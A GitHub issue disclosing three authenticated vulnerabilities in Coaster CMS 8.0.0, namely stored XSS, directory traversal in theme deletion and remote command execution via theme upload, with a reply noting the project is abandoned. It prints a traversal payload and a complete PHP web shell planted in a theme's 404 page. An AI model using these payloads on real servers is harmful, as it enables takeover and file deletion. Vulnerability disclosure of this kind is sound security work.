CoasterCms / coastercms

The repository for Coaster CMS (coastercms.org), a full featured, Laravel based Content Management System
https://www.coastercms.org
GNU General Public License v3.0
392 stars 107 forks source link

Security Issues in the 8.0.0 version. #94

Open lur1el opened 10 months ago

lur1el commented 10 months ago

I have identified three security vulnerabilities in version 8.0.0. These vulnerabilities include Cross-Site Scripting (XSS), Directory Traversal in the Delete Feature, and Remote Command Execution. All vulnerabilities are exploitable in an authenticated state.

Stored cross-site scripting (also known as second-order or persistent XSS)

Stored Cross-Site Scripting (XSS) is a security vulnerability commonly found in web applications. It allows attackers to inject malicious scripts into web pages viewed by other users. This malicious code is stored on the server, such as in a database, and is then retrieved and displayed to users. Stored XSS attacks can lead to the theft of cookies, session tokens, or other sensitive information belonging to the victim. Unlike reflected XSS, which requires tricking a user into clicking a link, stored XSS does not require any action from the victim.

Steps to Reproduce

  1. Authenticate the application (the permission level does not matter as they all have access to the entry point).
  2. Go to the endpoint -> /admin/account/name/
  3. Insert the payload to trigger the JavaScript injection.

Affected Pages

  1. /admin/users/edit/ID/
  2. /admin/account/

Images

XSS_Request

XSS_Response

XSS_Affected_Page

Remediation


Directory traversal on delete feature leading to Denial of Service (Admin level).

Directory traversal in a "delete" feature refers to a vulnerability where an attacker can access and delete files outside the intended directory in a system. By manipulating file paths, attackers can reach critical system files or directories. This can lead to Denial of Service (DoS) if essential files or services are deleted, rendering the application or server inoperative. The impact of such an attack can be severe, including system downtime, loss of data, and potential security breaches. This vulnerability underscores the importance of proper input validation and access controls in web applications.

Steps to Reproduce

  1. Authenticate the application (the permission level does not matter as they all have access to the entry point).
  2. Go to the page -> /admin/themes/list/
  3. Click to delete any theme you want.
  4. Intercept the request of the endpoint -> /admin/themes/manage/ in any proxy.
  5. Change the parameter "theme=THEME_NAME" to the payload theme=../../var/www/coastercms

Affected Endpoint

  1. /admin/themes/manage/

Images

Delete_Dir_Traversal_Request

Delete_Dir_Traversal

Remediation


Remote command execution through file upload

Remote Command Execution (RCE) through file upload is a vulnerability where an attacker uploads a malicious file to a server, which is then executed. This often occurs when an application does not properly validate or restrict file types during the upload process. Successful exploitation allows the attacker to execute arbitrary code on the server, potentially gaining full control. The impact can include data theft, server hijacking, and the spread of malware to other systems. This highlights the critical need for stringent file upload security measures in web applications.

Steps to Reproduce

  1. Authenticate the application (Admin level).
  2. Go to the page -> /admin/themes/list/
  3. To make things easier, download any theme in the list by clicking on the button "Export". (the source code performs verification of directory names in the .zip, and to successfully upload, we need to match these patterns)
  4. Click on the button "Export with page data"
  5. Decompress your zip file
  6. Just to do a simple PoC go to the directory path /views/errors/
  7. Edit the file 404.blade.php and put the following payload
    <body>
    <form method="GET" name="<?php echo basename($_SERVER['PHP_SELF']); ?>">
    <input type="TEXT" name="cmd" autofocus id="cmd" size="80">
    <input type="SUBMIT" value="Execute">
    </form>
    <pre>
    <?php
    if(isset($_GET['cmd']))
    {
        system($_GET['cmd']);
    }
    ?>
    </pre>
    </body>
    </html> 
  8. Compress your new theme to zip
  9. Go back to the browser and click on the button "Upload a new theme"
  10. Activate your uploaded theme
  11. Trigger 404 error accessing something that does not exist like -> /coaster/hakai
  12. On the 404 error page, you can see the cmd input. This can also be accessed with -> /coaster/hakai?cmd=whoami

OBS: This can also be achieved by editing the files at the endpoint -> /admin/themes/edit/2/

Affected Pages

  1. /admin/themes/manage/

Images

RCE_File_Upload_Code

RCE_File_Upload_Page

RCE_File_Upload_PoC

RCE_Edit_Laravel_File

Remediation


All vulnerabilities were found in an authenticated state. Environment: Issues were found, Ubuntu with CoasterCMS 8.0.0 Version.

GaalexxC commented 7 months ago

@lur1el very nice thorough write up, but maybe you didn't notice this project is dead. Hasn't been updated in over 4 years and no one answers the issues posted. Find a better, more recent CMS project that supports Laravel 10+